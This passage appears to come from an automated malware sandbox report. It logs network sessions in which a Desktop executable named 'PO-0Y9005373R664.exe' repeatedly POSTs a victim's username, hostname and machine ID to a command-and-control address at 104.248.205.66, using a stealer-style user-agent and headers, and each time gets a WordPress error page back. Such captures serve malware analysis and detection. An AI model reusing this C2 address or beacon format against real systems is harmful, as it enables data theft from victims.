                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:05.911021948 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:05.911039114 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.849726104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:06.060564041 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:06.065701962 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:08.537945032 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:06 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:08.537965059 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:08.537977934 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.849727104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:08.685470104 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:08.690897942 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:11.041562080 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:09 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:11.041579962 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:11.041590929 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.849728104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:11.185287952 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:11.192104101 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:14.150966883 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:11 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:14.150990009 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:03:14.151000977 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                        Aug 29, 2024 12:03:14.151654959 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:11 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:14.152595043 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:11 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.849729104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:03:14.293207884 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:03:14.298156977 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:03:16.695571899 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:03:14 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:03:16.695585966 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
